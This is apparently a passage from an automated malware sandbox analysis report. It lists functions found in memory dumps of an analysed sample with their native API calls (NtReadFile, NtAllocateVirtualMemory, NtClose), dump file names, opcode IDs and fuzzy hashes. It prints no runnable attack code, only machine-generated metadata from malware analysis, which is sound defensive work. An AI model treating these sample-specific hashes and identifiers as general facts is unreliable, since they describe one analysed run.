                                                                                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction Fuzzy Hash: AEF0BDB2200108AFCB14DF89DC91EEB77ADEF8C754F158248BE5D97241D630E811CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00139DFE, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(00134D32,5EB6522D,FFFFFFFF,001349F1,?,?,00134D32,?,001349F1,FFFFFFFF,5EB6522D,00134D32,?,00000000), ref: 00139E45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                                                                                                                                                      • Instruction ID: 05a326e8818514abdec4d43c542d03df45b39e90e537a03c69dbaafb0683d2d2
                                                                                                                                                      • Opcode Fuzzy Hash: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                                                                                                                                                      • Instruction Fuzzy Hash: 45F0A4B6200108AFCB14DF89DC91EEB77A9AF8C354F168649BA5DA7251C630E8118BA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00139F2B, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 00139F69
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                                                                                                                                                      • Instruction ID: 778357d56b27276f2a7b0dfa19d7c3730a44df0bb7c265a3fcc9877e59f16782
                                                                                                                                                      • Opcode Fuzzy Hash: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                                                                                                                                                      • Instruction Fuzzy Hash: DCF058B2210218AFCB18DF88DC91EEB77ADAF88310F158208FA5C97241C630E910CBE0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00139F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 00139F69
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction ID: 4f4ac166a8b710a4bc06ae19ad0e10a5ad7a4251d88ac70fe9679c7f19c47165
                                                                                                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction Fuzzy Hash: 95F015B2200208AFCB14DF89CC81EAB77ADAF88754F118148BE58A7241C630F810CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00139E7A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(00134D10,?,?,00134D10,00000000,FFFFFFFF), ref: 00139EA5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                                                                                                                                                      • Instruction ID: 3a829b415f7fd37cbb9ddc204cb71f2f8a8deb2a3a3a397260e3395d64ed8444
                                                                                                                                                      • Opcode Fuzzy Hash: bc5b2de0da1b5ef0375440ba87564657268f0f0a75ea414756b91c00acfdd9db
                                                                                                                                                      • Instruction Fuzzy Hash: 05E0C235200104AFD710EFA8CC8AFE7BB68EF48350F064199FA9CAB241C631F650C790
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00139E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(00134D10,?,?,00134D10,00000000,FFFFFFFF), ref: 00139EA5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                      • Instruction ID: 6abf99105ef956642481de90de61aae5b4d38c3add14c27e6300864f53b08f85
                                                                                                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                      • Instruction Fuzzy Hash: 91D01275200214ABD710EB98CC45F97775CEF44750F154455BA5C5B242C530F50087E0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F700C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F707AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                      • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                      • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                      • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                      • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                      • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                      • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                      • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                      • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                      • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01F6FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378603369.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                      • Associated: 00000007.00000002.2378598720.0000000001F50000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378700891.0000000002040000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378707333.0000000002050000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378712337.0000000002054000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378720300.0000000002057000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378727872.0000000002060000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000007.00000002.2378783797.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
